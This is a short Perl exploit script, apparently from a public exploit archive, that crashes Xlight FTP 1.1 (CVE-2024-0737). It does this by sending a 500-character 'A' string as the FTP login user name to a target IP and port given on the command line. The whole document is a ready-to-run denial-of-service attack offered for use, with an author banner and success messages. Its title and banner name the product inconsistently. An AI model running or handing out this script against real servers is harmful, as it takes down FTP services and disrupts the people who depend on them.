1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 |
# Exploit Title: Xlight FTP 1.1 - Denial Of Service (DOS) # Google Dork: N/A # Date: 22 July 2025 # Exploit Author: Fernando Mengali # LinkedIn: https://www.linkedin.com/in/fernando-mengali/ # Vendor Homepage: https://www.xlightftpd.com # Software Link: N/A # Version: 1.1 # Tested on: Windows XP # CVE: CVE-2024-0737 $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $payload = "\x41"x500; my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@"; $ftp->login($payload,"anonymous") or die "[+] Possibly exploited!"; $ftp->quit; print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print q { ,--, _ ___/ /\| ,;'( )__, )~ //// '--; ' \ | ^ ^^ [+] LightFTP 1.1 - Denial of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: fernando.mengalli@gmail.com } } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } |